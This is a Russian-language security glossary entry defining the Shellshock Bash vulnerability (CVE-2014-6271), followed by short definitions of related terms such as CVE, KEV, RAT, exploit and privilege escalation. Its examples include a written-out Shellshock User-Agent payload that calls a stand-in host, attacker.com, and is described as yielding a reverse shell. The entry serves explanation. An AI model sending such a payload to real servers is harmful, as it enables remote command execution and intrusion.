Уязвимости
Shellshock (CVE-2014-6271)
Также известно как: Bashdoor, CVE-2014-6271
Определение
Уязвимость GNU Bash 2014 года, позволявшая выполнять произвольные команды через специально сконструированные переменные окружения, передаваемые в Bash другими программами.
Примеры
- Отправка User-Agent: () { :; }; /bin/curl attacker.com на Bash-CGI endpoint для получения reverse shell.
- Эксплуатация DHCP-клиента, передающего строки опций в окружение Bash-хука.
Связанные термины
Command Injection
Command Injection — definition coming soon.
CVE (Common Vulnerabilities and Exposures)
Публичный каталог, присваивающий уникальный идентификатор каждой раскрытой уязвимости ПО или оборудования для однозначных ссылок в индустрии.
Известная эксплуатируемая уязвимость (KEV)
CVE, активная эксплуатация которой подтверждена CISA США и которая включена в публичный каталог KEV, что устанавливает сроки устранения для федеральных ведомств США.
Троян удалённого доступа (RAT)
Вредоносное ПО, дающее злоумышленнику скрытое интерактивное управление заражённым устройством, по сути скрытое средство удалённого администрирования.
Эксплойт
Код, данные или метод, использующий уязвимость для вызова непредусмотренного поведения — выполнения кода, повышения привилегий или раскрытия информации.
Повышение привилегий
Класс уязвимостей, позволяющий злоумышленнику получить права выше предоставленных изначально, например перейти от обычного пользователя к администратору.